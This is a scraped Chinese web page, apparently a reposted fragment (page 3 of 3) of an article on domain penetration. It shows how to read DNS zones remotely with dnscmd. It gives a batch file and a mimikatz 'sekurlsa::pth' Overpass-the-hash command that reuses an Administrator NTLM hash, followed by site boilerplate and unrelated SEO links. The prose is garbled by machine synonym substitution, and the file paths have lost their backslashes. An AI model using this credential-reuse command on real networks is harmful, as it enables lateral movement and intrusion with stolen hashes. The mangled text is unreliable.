域渗透——DNS记录的获取

发布时间：2019-03-29 22:03:34 所属栏目：建站来源：3gstudent

导读：0x00 媒介在域渗出中，对域情形的信息汇集很要害，假如我们得到了域内打点员的权限，那么怎样可以或许快速相识域内的收集架构呢?DNS记录无疑是一个很好的参考。本文将要先容在域渗出中，获取DNS记录的常用要领。 0x01 简介本文将要先容以下内容：通过DNS M

如下图：

域渗出——DNS记录的获取

假如想在呼吁行下实现整个流程，可以回收如下要领：

新建c:test1.bat，内容如下：

Dnscmd WIN-F08C969D7FM.test.com /EnumZones > c:testout.txt

Overpass-the-hash:

mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40 /run:"cmd.exe /c c:test1.bat""

注：cmd.exe下"必要行使转义字符"

0x05 小结

本文先容了在域内行使Overpass-the-hash实现dnscmd长途读取DNS记录的要领。

【编辑保举】

合用于Windows，Linux和OS X的2018年优越黑客器材
什么是 DNS，为什么它与你有关？根证书又是啥？
影响世界400万IP：家用路由器DNS遭改动跳转黄赌网站
常见的几种Windows后门耐久化方法
什么是DNS挟制进攻以及怎样停止此类进攻？

【责任编辑：武晓燕 TEL：（010）68476606】
点赞 0

（编辑：湖南网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!

3/3

首页

SEO排名难做的四大原因	在保持网站优化的同时
网站SEO优化的几个技巧	网站原创内容怎么写？